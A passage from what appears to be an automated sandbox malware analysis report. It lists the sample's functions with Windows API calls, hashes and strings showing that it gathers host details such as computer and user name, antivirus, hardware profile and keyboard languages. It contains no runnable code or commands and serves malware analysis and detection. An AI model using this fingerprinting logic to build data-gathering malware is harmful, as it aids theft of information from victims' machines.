                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcat$File$Heapwsprintf$AllocateAttributesCopyDeleteFindFirstFolderPathProcesslstrcpy
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3709078413-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 767a59386f8cb8acb26b9478434e1db05326316e2e632ca0ea0f0e4ec4d9d7df
                                                                                                                                                                                                                                                                                                                    • Instruction ID: ce4a7c123a84b3ffc87cd66b9d75f1b011a83a7ebb0104db87a3d7e580b97e43
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 767a59386f8cb8acb26b9478434e1db05326316e2e632ca0ea0f0e4ec4d9d7df
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA51E7B5A0011C9BCB64DB74CC95ADDB7B8FB4C311F4048E6EB09E3254EA70AB998F54
                                                                                                                                                                                                                                                                                                                    Function 008F32E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60stringCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008F332A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F421B: malloc.MSVCRT ref: 008F4220
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F421B: strncpy.MSVCRT ref: 008F4231
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 008F3352
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00917E68), ref: 008F336F
                                                                                                                                                                                                                                                                                                                    • GetCurrentHwProfileA.ADVAPI32(?), ref: 008F32FB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
                                                                                                                                                                                                                                                                                                                    • String ID: Unknown
                                                                                                                                                                                                                                                                                                                    • API String ID: 2781187439-1654365787
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 79b1491d7ca7757120c91845f223300ddf6dc05610f6ef1a767f52679a5d496c
                                                                                                                                                                                                                                                                                                                    • Instruction ID: d68b6cc9df1c42d790cb81f430ff8369d5170ba8cc5d12d7fa85a9a26876e102
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79b1491d7ca7757120c91845f223300ddf6dc05610f6ef1a767f52679a5d496c
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09115E71A4421CABDB20EB78DC46FDDB3B8FB04700F0004E1B649E7261DAB4AF848B55
                                                                                                                                                                                                                                                                                                                    Function 008F2D75 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45memoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00917950,Display Resolution: ,00917934,00000000,User Name: ,00917924,00000000,Computer Name: ,00917910,AV: ,00917904,Install Date: ), ref: 008F2D8D
                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008F2D94
                                                                                                                                                                                                                                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 008F2DB0
                                                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 008F2DD6
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                                                                                                                                                    • String ID: %d MB
                                                                                                                                                                                                                                                                                                                    • API String ID: 2922868504-2651807785
                                                                                                                                                                                                                                                                                                                    • Opcode ID: ef205e2b94287e1597f8311687a7c2dfd835ed904d295f156176b6a352e7cd42
                                                                                                                                                                                                                                                                                                                    • Instruction ID: cc66147af98f6e4cfd3f5265df08439b6816ba45ec8b7aaa3726b0d58b570760
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef205e2b94287e1597f8311687a7c2dfd835ed904d295f156176b6a352e7cd42
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B0186B1A4020CABEB14EFB8DC45EFEB7B8FF04341F540429FA02E7190DA709A028765
                                                                                                                                                                                                                                                                                                                    Function 6C98C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetSystemInfo.KERNEL32(?), ref: 6C98C947
                                                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C98C969
                                                                                                                                                                                                                                                                                                                    • GetSystemInfo.KERNEL32(?), ref: 6C98C9A9
                                                                                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C98C9C8
                                                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C98C9E2
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Virtual$AllocInfoSystem$Free
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 4191843772-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 84c5bfda3c6292df1de72dde4d266529e929f3c1f97298657466e5288d804581
                                                                                                                                                                                                                                                                                                                    • Instruction ID: af2cd4140d1f6ca2312aa1d56a49d15fff7420ee7c03c09785c3698cf728fd2d
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 84c5bfda3c6292df1de72dde4d266529e929f3c1f97298657466e5288d804581
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F321F932746214ABDB04AE64EC84BAE73B9AF46704F60065AF957A7B40DB71DC04C7A1
                                                                                                                                                                                                                                                                                                                    Function 008E49DE Relevance: 7.6, APIs: 5, Instructions: 50stringnetworkCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 008E4A10
                                                                                                                                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 008E4A16
                                                                                                                                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 008E4A1C
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(000000FF,00000000,?), ref: 008E4A2E
                                                                                                                                                                                                                                                                                                                    • InternetCrackUrlA.WININET(000000FF,00000000), ref: 008E4A36
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CrackInternetlstrlen
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1274457161-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 11aaefa02c9ce1682d44b56240b1661eff0805efa4c93f5e3242c5be4373cab6
                                                                                                                                                                                                                                                                                                                    • Instruction ID: e901d5782e2a5cecc589ff8420d19d2de71329183311474a799c3c848aa59fc9
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 11aaefa02c9ce1682d44b56240b1661eff0805efa4c93f5e3242c5be4373cab6
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 19010932D00218ABCB149BA9DC45ADEBFB8EF55330F108216E925E72A1DA746602CB94
                                                                                                                                                                                                                                                                                                                    Function 008F2BAD Relevance: 7.5, APIs: 5, Instructions: 35registrymemoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,008F5F8F,Processor: ,[Hardware],00917990,00000000,TimeZone: ,00917980,00000000,Local Time: ,0091796C), ref: 008F2BC1
                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008F2BC8
                                                                                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,009178C8,?,?,?,008F5F8F,Processor: ,[Hardware],00917990,00000000,TimeZone: ,00917980,00000000,Local Time: ), ref: 008F2BE6
                                                                                                                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(009178C8,00000000,00000000,00000000,000000FF,?,?,?,008F5F8F,Processor: ,[Hardware],00917990,00000000,TimeZone: ,00917980,00000000), ref: 008F2C02
                                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(009178C8,?,?,?,008F5F8F,Processor: ,[Hardware],00917990,00000000,TimeZone: ,00917980,00000000,Local Time: ,0091796C,Keyboard Languages: ,00917950), ref: 008F2C0B
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3225020163-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: ef698c72c42fb2798e9d8552efe49a463aba92826b3a537b94e38b88db9feed6
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 0b48548efa6c87f1fb4ef9fd4d57053a941306c49efb081f9330e7c663be3253
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef698c72c42fb2798e9d8552efe49a463aba92826b3a537b94e38b88db9feed6
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0F05E75640208FFEB209B90DC0EFAE7A7DFB44B01F100124FB01E60A0EBB15A12DB60
                                                                                                                                                                                                                                                                                                                    Function 008E9622 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87libraryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,008EEAFD), ref: 008E963B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21A5: lstrlen.KERNEL32(?,?,008F9098,009177FE,00917787,?,?,?,?,008F9D6E), ref: 008F21AB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21A5: lstrcpy.KERNEL32(00000000,00000000), ref: 008F21DD
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcpy.KERNEL32(00000000,?), ref: 008F2251
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcat.KERNEL32(?,?), ref: 008F225B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                    • SetEnvironmentVariableA.KERNEL32(?,00918334,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00917846,?,?,?,?,?,?,?,?,008EEAFD), ref: 008E9690
                                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,008EEAFD), ref: 008E96A4
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 008E962F, 008E9634, 008E964E
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                                                                                                                                                                    • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                                                                                                                                                                                                                    • API String ID: 2929475105-1843082770
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 1d224c7c0fdbb7eaadaece02860f338e17073d4d52cf740bfa632bf24f5087f1
                                                                                                                                                                                                                                                                                                                    • Instruction ID: a814e0e96a00fe140fd81279898a2c5b5d07a44e798e5b8235c01cf70af023e9
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d224c7c0fdbb7eaadaece02860f338e17073d4d52cf740bfa632bf24f5087f1
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F314B35A00159EBCB21EF3EEE05899BBB4FB6A7007114925E950E3231DF711A47CF81
                                                                                                                                                                                                                                                                                                                    Function 008F8B15 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55stringCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 008F8B1C
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,0000001C), ref: 008F8B27
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 008F8BAB
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: H_prolog3_catchlstrlen
                                                                                                                                                                                                                                                                                                                    • String ID: ERROR
                                                                                                                                                                                                                                                                                                                    • API String ID: 591506033-2861137601
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 0f8dc0d2fe7cffe692ad20bf1a91a261ab64cb4c7d5526329156099f10ebd7c3
                                                                                                                                                                                                                                                                                                                    • Instruction ID: bf8bb17c126c371403cc703cd5582def337fd96ed5ed114ff173edd09f55735a
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f8dc0d2fe7cffe692ad20bf1a91a261ab64cb4c7d5526329156099f10ebd7c3
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA115E7190050EEFCB50FFB8D9069ADBBB0FF44310B400521EA14E3661DB71AAA5CBC6
                                                                                                                                                                                                                                                                                                                    Function 008EC27B Relevance: 6.2, APIs: 4, Instructions: 196filestringCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
